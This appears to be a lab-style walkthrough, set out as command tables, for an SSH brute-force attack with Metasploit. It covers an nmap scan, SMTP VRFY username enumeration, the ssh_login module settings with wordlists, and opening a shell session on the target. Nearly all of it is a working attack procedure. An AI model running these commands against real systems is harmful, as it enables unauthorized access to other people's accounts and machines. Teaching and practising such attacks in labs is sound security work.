SSH Brute-Force
SSH is generally secure due to its use of encryption, but its authentication layer can still be compromised through weak or reused passwords. This attack uses Metasploit's ssh_login module to systematically test username and password combinations against a target, gaining access whenever a valid credential pair is found. Before running the attack, wordlists containing candidate usernames and passwords should be prepared in advance.
Discovery
| Command | Description |
|---|---|
| nmap -A -p- -T5 [target IP] | Scans all ports with service versions and OS detection; SSH (22) is identified as open. |
Enumeration
| Command | Description |
|---|---|
| smtp-user-enum -M VRFY -U /usr/share/wordlists/fern-wifi/common.txt -t [target IP] | Queries the SMTP server's VRFY command with each username in the wordlist, revealing which ones actually exist on the system — providing verified usernames to use in the SSH brute-force attempt instead of guessing blindly. |
Attack
| Command | Description |
|---|---|
| msfconsole | Launches the Metasploit Framework console. |
| search ssh | Searches for modules related to SSH. |
| use auxiliary/scanner/ssh/ssh_login | Selects the SSH login brute-force scanner module. |
| show options | Displays the required parameters for the module. |
| set rhosts [target IP] | Sets the target's IP address. |
| set USER_FILE /usr/share/wordlists/sshusers.txt | Verified usernames discovered via SMTP enumeration. |
| set PASS_FILE /usr/share/wordlists/sshpassword.txt | Sets the wordlist file containing candidate passwords to try. |
| exploit | Launches the brute-force attempt in the foreground, showing each username/password combination as it's tried. |
Verification
| Command | Description |
|---|---|
| sessions -l | Lists active sessions. |
| sessions -i [id] | Connects to the session opened with the discovered credentials. |
| whoami | Confirms which user account and credentials were discovered — in this case, msfadmin rather than root. |
| uname -a | Displays the target system's kernel information. |
| ls | Confirms file access within the compromised account. |
Tool Used
This attack was carried out using Metasploit Framework — see the full command reference here.